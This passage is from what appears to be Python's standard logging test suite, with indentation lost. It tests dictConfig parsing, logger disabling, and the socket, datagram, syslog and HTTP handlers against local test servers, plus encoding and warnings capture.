"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
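# SocketHandler frames each record as a 4-byte big-endian length prefix
# followed by a pickled dict of LogRecord attributes; undo that framing
# here and rebuild the record with makeLogRecord().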
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
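# DatagramHandler uses the same 4-byte length header as SocketHandler, so
# strip it before unpickling the LogRecord attribute dict.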
slen = struct.pack('>L', 0) # dummy value, used only for the prefix length
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls(('localhost', server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
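# The b'<11>' prefix asserted below is the syslog PRI value:
# facility LOG_USER (1) * 8 + severity 'error' (3).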
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
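# --- Illustrative sketch (not part of the original test suite) ---
# The b'<11>' prefix asserted above is the syslog PRI field: facility
# LOG_USER (1) * 8 + severity LOG_ERR (3) = 11.  append_nul controls the
# trailing NUL byte and ident is prepended verbatim, as the assertions show.
def _syslog_priority_for_error():
    SysLogHandler = logging.handlers.SysLogHandler
    return SysLogHandler.LOG_USER * 8 + SysLogHandler.LOG_ERR   # == 11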
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
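# --- Illustrative sketch (not part of the original test suite) ---
# HTTPHandler.mapLogRecord() returns the record's __dict__, which emit()
# url-encodes into the GET query string or the POST body -- that is why
# test_output() above can parse_qs() the request and read the 'name',
# 'funcName' and 'msg' keys.  Hypothetical helper; no request is sent.
def _http_handler_payload(record):
    from urllib.parse import urlencode
    handler = logging.handlers.HTTPHandler('localhost:80', '/frob')
    try:
        return urlencode(handler.mapLogRecord(record))
    finally:
        handler.close()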
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
        # Non-ASCII data written through a FileHandler opened with an
        # explicit encoding should round-trip.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
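# --- Illustrative sketch (not part of the original test suite) ---
# captureWarnings(True) swaps warnings.showwarning for a version that logs
# through the 'py.warnings' logger, which is why the tests above attach and
# inspect handlers on that specific logger name.  Minimal usage sketch:
def _capture_warnings_demo():
    import io
    import warnings
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    logger = logging.getLogger('py.warnings')
    logger.addHandler(handler)
    logging.captureWarnings(True)
    try:
        with warnings.catch_warnings():
            warnings.simplefilter('always')
            warnings.warn('routed through logging')
    finally:
        logging.captureWarnings(False)
        logger.removeHandler(handler)
        handler.close()
    return stream.getvalue()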
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
        # config2 refers to a nonexistent stream ('ext://sys.stdbout') and should be rejected.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
        # config2a has a misspelt handler level ('NTOSET') and should be rejected.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
        # config2b has a misspelt root logger level ('WRANING') and should be rejected.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
        # config3 references an undefined formatter and should be rejected.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    # Same as test_config7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
            # Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
